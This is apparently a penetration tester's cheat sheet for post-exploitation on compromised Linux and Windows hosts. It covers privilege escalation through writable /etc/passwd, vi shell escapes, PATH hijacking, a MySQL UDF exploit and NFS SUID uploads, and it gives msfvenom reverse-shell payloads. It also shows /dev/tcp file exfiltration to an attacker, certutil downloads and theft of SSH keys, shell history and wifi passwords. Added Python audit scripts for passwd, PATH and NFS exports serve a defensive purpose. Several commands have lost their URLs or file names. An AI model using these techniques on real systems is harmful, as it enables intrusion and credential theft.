
What to do once you're on the Box

Privilege Escalation


sudo -l will tell you what the user is allowed to execute with sudo without entering a password. Also keep an eye on the environment variables that are inherited (env_keep info).

Check if DLL loading is possible.

find / -type f -a \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null to find SUID, SGID files.

Run curl | sh to get the full information about the box, including files with the setuid flag set that you are allowed to execute, and your sudo permissions.

You can also run another script (wget "" -O; chmod 700), which is also very good!

You can also run wget; sh ./, which is an alternative to linPEAS.

To switch between users once you have the credentials, use su <username> and enter the password.

Take a thorough look at which files/services can be executed as root by the current user and check how they can be exploited.

Here are the easiest ones.

Cookbooks for Privilege Escalation:

* PayloadsAllTheThings - Methodology and Resources/Linux - Privilege Escalation

Writable /etc/passwd and /etc/shadow file

In case /etc/passwd is writable, we can append a line to it that adds a new user with UID 0 (root). In case /etc/shadow is writable, you can replace the password hashes.

The password hash is always between the first two colons like <username>:<passwordhash>:<otherthings>.

There are several ways to generate a new hash.


openssl passwd -1 -salt <somesalt> <newpassword>
# -1 = optional, selects the MD5-based crypt format ($1$...)
# -salt = optional, supplies the salt; a unique salt defeats precomputed (rainbow table) attacks


mkpasswd -m sha-512 <newpassword>

Add a new user to /etc/passwd

echo '<username>:<passwordhash>:0:0:<optional comment>:/root:/bin/bash' >> /etc/passwd
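From the defender's side, the tampering described above leaves clear traces: a second UID 0 entry, or a hash sitting directly in the password field of /etc/passwd instead of the usual x. The following audit script is an added example (not part of the original notes) that parses passwd-format text, flags those traces and checks a file mode for world-writability; the sample content is constructed, and the hash value in it is a placeholder.

```python
import stat

# Constructed sample in /etc/passwd format (not taken from any real host).
# The last line imitates the kind of entry described above: a hash placed
# directly in the password field and UID/GID 0, i.e. a second root account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup2:$1$somesalt$PLACEHOLDERHASHVALUE:0:0:maintenance:/root:/bin/bash
"""

# Values that mean "no usable password here": shadowed, locked or disabled.
NON_HASH_MARKERS = {"x", "*", "!", "!!", "*NP*"}


def parse_passwd(text):
    """Split passwd-format text into dicts; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "malformed": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return human-readable findings for entries that indicate tampering."""
    findings = []
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(f"line {e['line']}: malformed entry {e['malformed']!r}")
            continue
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"line {e['line']}: extra UID 0 account {e['name']!r}")
        if e["pw"] == "":
            findings.append(f"line {e['line']}: {e['name']!r} has an empty password field")
        elif e["pw"] not in NON_HASH_MARKERS:
            findings.append(f"line {e['line']}: {e['name']!r} carries a hash in "
                            f"/etc/passwd, bypassing /etc/shadow")
    return findings


def is_world_writable(mode):
    """True if st_mode bits allow writes by 'other' (use os.stat(path).st_mode)."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
    # On a live host the same functions apply to the real files, e.g.
    #   audit_passwd(open("/etc/passwd").read())
    #   is_world_writable(os.stat("/etc/passwd").st_mode)
```

A baseline copy of /etc/passwd compared against the live file (or file-integrity monitoring on both files) catches the same changes without having to interpret every field.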

Escaping Vi Editor

If vi is listed in the sudo -l output, you can simply run sudo vi and then :!sh to get a root shell through the editor.

Exploiting crontab

Run cat /etc/crontab to see scheduled tasks, maybe one of them is exploitable.

Take a look at the environment variables defined in the crontab file (e.g. PATH); where a job calls a script without an absolute path, cron can be misled by where the script is located.

In case a script is executed you can create a payload to create a bind/reverse shell with msfvenom -p cmd/unix/reverse_netcat lhost=<local/remote ip> lport=8888 R. Don't forget to listen for it with nc -lvnp 8888.

Exploiting PATH environment variable

The PATH environment variable, defined as /path1:/path2:/path3, holds all directories in which an executable is searched for. Unlike on Windows, the current directory is not searched unless the PATH contains a . element.

To exploit the PATH we need a SUID executable which calls another executable without a full path. Use strings <executable> to get a hint whether an executable name occurs, or run the executable and check with ps/top whether a sub-executable is called at some point.

The next step is to create a bash script with the name of the called executable, containing a bind/reverse shell or simply /bin/bash. It may be required to extend the PATH variable with export PATH=/new/path:$PATH.

cd /tmp
echo "/bin/bash" > ls
chmod +x ls
export PATH=/tmp:$PATH
# execute the SUID file now
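The weakness the PATH hijack above relies on is visible from the defender's side: a . or empty element in PATH, a relative entry, or a world-writable directory (such as /tmp) ahead of the system directories. This audit function is an added example, not part of the original notes; the PATH value it checks is constructed, and the writability check can be swapped out so the logic can be tested without touching the filesystem.

```python
import os
import stat

# Constructed PATH value that exhibits each weakness discussed above:
# a world-writable directory first, a '.' element, a relative entry and
# an empty element (the trailing colon), which POSIX treats as '.'.
SAMPLE_PATH = "/tmp:/usr/local/bin:.:/usr/bin:bin:"


def _world_writable(directory):
    """Real filesystem check. The sticky bit on /tmp does not help here: it
    only stops deleting other users' files, not creating a new 'ls' there."""
    try:
        mode = os.stat(directory).st_mode
    except OSError:
        return False
    return bool(mode & stat.S_IWOTH)


def audit_path(path_value, writable_check=_world_writable):
    """Return findings for a PATH string. `writable_check` is injectable so the
    function can be exercised on constructed data."""
    findings = []
    for index, element in enumerate(path_value.split(":")):
        if element == "":
            findings.append(f"element {index}: empty entry (searches the current directory)")
        elif element == ".":
            findings.append(f"element {index}: '.' searches the current directory")
        elif not element.startswith("/"):
            findings.append(f"element {index}: relative entry {element!r}")
        elif writable_check(element):
            findings.append(f"element {index}: world-writable directory {element!r}")
    return findings


if __name__ == "__main__":
    print("sample:", *audit_path(SAMPLE_PATH, writable_check=lambda d: d == "/tmp"), sep="\n  ")
    print("live:", *audit_path(os.environ.get("PATH", "")), sep="\n  ")
```

The same check is worth running on the PATH a SUID binary or cron job actually inherits (the PATH line in /etc/crontab, or the secure_path setting in /etc/sudoers), since that is the value that decides which binary gets executed. Fixing the root cause means calling helpers by absolute path in the SUID program itself.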

MySQL Server

In case the MySQL server is accessible and runs as root, we can load a dynamic library (a user-defined function) that gives us root rights.

cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname, -o raptor_udf2.o -lc
mysql -u root
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/';
create function do_system returns integer soname '';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
/tmp/rootbash -p

Upload SUID files via NFS

In case the victim server has network shares open (nmap -p 135,445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP, or via cat /etc/exports), you can try to create a file with the SUID bit set on this share from the attacker machine and execute it on the victim server.

Try to read the /etc/exports file, which contains the option flags for each share. The no_root_squash flag means that files uploaded via the share keep their SUID bit and root ownership; otherwise root is mapped to the "nobody" user and the SUID bit is useless.

# attacker box
mkdir /tmp/nfs
mount -o rw,vers=2 /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell
chmod +xs /tmp/nfs/shell
# victim box
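Whether an export is exposed to the technique above can be read straight from /etc/exports, so the check is easy to automate on the server side. The parser and audit below are an added example, not part of the original notes; the exports content is constructed and covers the forms the file can take (a client with options, a wildcard client, several clients on one line, and an options-free client that falls back to the defaults, which are ro and root_squash).

```python
# Constructed /etc/exports content (not from any real server).
SAMPLE_EXPORTS = """\
# shares handed to the backup network
/srv/share  192.168.1.0/24(rw,sync,no_root_squash)
/home       *(rw,sync)
/opt/data   host1(ro,root_squash) host2(rw,no_root_squash,no_subtree_check)
"""


def parse_exports(text):
    """Return one dict per (path, client) pair: {'path', 'client', 'options'}.
    A bare '(opts)' token with no client name means 'any client', i.e. '*'."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        tokens = line.split()
        path, clients = tokens[0], tokens[1:]
        for token in clients:
            if "(" in token and token.endswith(")"):
                client, opts = token[:-1].split("(", 1)
                options = [o for o in opts.split(",") if o]
            else:                                 # no option list: defaults apply
                client, options = token, []
            exports.append({"path": path, "client": client or "*", "options": options})
    return exports


def audit_exports(text):
    """Flag exports where remote root keeps UID 0, or that are open to any client."""
    findings = []
    for e in parse_exports(text):
        opts = set(e["options"])
        where = f"{e['path']} -> {e['client']}"
        if "no_root_squash" in opts:
            findings.append(f"{where}: no_root_squash (remote root keeps UID 0; "
                            f"SUID files written here run as root on the server)")
        if e["client"] == "*":
            findings.append(f"{where}: exported to any client")
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
    # Against a real server: audit_exports(open("/etc/exports").read())
```

Removing no_root_squash (the default already squashes root) closes the path described in this section; where the export must stay as it is, mounting it on the consuming side with the nosuid option stops SUID bits on the share from taking effect.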

Kernel Exploits

Kernel exploits are one of the last resorts for getting higher privileges, because they can leave the target server in an unstable state.

Linux Exploit Suggester

wget -O
chmod +x

Each found exploit has a level which indicates how likely the attempt is to succeed:

* Highly probable - the assessed kernel is most probably affected and there's a very good chance that the PoC exploit will work out of the box without any major modifications.
* Probable - it's possible that the exploit will work, but most likely customization of the PoC exploit will be needed to suit your target.
* Less probable - additional manual analysis is needed to verify if the kernel is affected.
* Unprobable - highly unlikely that the kernel is affected (the exploit is not displayed in the tool's output).

Linux Exploit Suggester 2

wget -O

Send files: VICTIM -> ATTACKER

on attacker: nc -lvnp $PORT > /file_to_save

on victim: cat $FILE > /dev/tcp/$HOSTIP/$PORT


certutil.exe -urlcache -split -f "" wp.bat
certutil.exe -urlcache -split -f "" pu.ps1
. ./pu.ps1

Kernel Exploits

Windows Exploit Suggester - Next Generation

Post Exploitation

C2 Servers


Migrate to another process:

* ps to find a process that is stable (e.g. explorer)
* psinject Listener ProcessID with the process id and the listener

Get windows build number: Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId

If build is < Win10 2004, try powershell/privesc/printdemon (CVE-2020-1048) with the base64 part of the stager and shell restart-computer -force for higher privilege.

Get the Loot


Get the ssh key!

cat ~/.ssh/id_rsa
cat /root/.ssh/id_rsa

Get the history of a user

cat ~/.*history | less

Get config files

Search the user's home directory with ls -la and see if you can find configuration directories and files!


Get wlan/wifi passwords on a windows machine (no admin priv needed)

netsh wlan export profile key=clear

Next step

Get on the next box